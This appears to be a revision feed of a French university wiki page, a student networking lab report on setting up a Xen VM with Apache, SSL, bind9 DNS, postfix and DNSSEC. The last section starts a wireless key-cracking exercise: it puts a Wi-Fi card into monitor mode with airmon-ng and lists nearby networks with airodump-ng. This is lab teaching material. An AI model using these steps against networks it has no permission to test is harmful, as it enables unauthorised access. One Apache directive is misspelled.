-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35646</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35646"/>
				<updated>2016-12-06T09:23:04Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35645</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35645"/>
				<updated>2016-12-06T09:22:23Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
